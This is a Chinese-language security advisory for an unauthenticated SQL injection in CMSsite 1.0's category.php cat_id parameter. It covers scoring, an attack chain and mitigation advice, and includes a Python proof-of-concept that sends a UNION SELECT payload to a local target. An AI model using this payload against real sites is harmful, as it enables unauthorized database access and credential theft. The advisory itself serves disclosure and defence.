CVE-2019-25697 CVSS 8.2 高危

CVE-2019-25697 CMSsite SQL注入漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25697

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CMSsite

漏洞概述

CMSsite 1.0版本中存在严重的SQL注入漏洞。由于系统未对`category.php`接口中的`cat_id`参数进行严格的输入过滤，未经身份验证的远程攻击者可以通过发送特制的GET请求注入恶意SQL代码。成功利用该漏洞可导致数据库信息泄露，攻击者能够获取包括用户名和密码在内的敏感数据。

技术细节

该漏洞的根本原因在于CMSsite 1.0在处理分类查询时，直接将用户通过GET请求提交的`cat_id`参数拼接到SQL查询语句中，而未使用参数化查询或进行有效的安全转义。攻击者可以利用经典的UNION SELECT语句绕过原有的查询逻辑，从数据库的其他表中提取数据。由于漏洞点无需用户登录即可访问（PR:N），且攻击复杂度低（AC:L），这极大地增加了被自动化工具利用的风险。攻击者一旦获取数据库凭据，可能进一步接管服务器权限。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别出目标服务器正在运行CMSsite 1.0，并定位到category.php接口。

STEP 2

步骤2：漏洞利用

攻击者构造包含恶意SQL代码的GET请求，将UNION SELECT载荷注入到cat_id参数中。

STEP 3

步骤3：数据窃取

后端数据库执行恶意查询，将敏感数据（如管理员密码哈希）包含在HTTP响应中返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration (Replace with actual target)
target_url = "http://127.0.0.1/cmssite/category.php"

def verify_sqli():
    # SQL Injection Payload to extract database version
    # Using UNION based injection to retrieve version()
    payload = "-1 UNION SELECT 1, version(), 3, 4-- -"
    
    # Parameters to be sent in the GET request
    params = {
        "cat_id": payload
    }
    
    try:
        # Send malicious request
        response = requests.get(target_url, params=params, timeout=5)
        
        # Check if the request was successful
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response snippet:")
            print(response.text[:500]) # Print first 500 chars for analysis
            
            # Logic to verify if DB version appeared in response would go here
            if "version" in response.text.lower():
                print("[!] Potential SQL Injection confirmed.")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    verify_sqli()

影响范围

CMSsite 1.0

防御指南

临时缓解措施

建议立即在Web应用防火墙（WAF）中部署规则，拦截针对category.php的包含UNION、SELECT等SQL关键字的恶意请求。对于无法立即升级的系统，应修改category.php源码，使用intval()函数强制转换cat_id变量类型，或者使用正则表达式限制其仅包含数字字符，从根本上阻断注入途径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表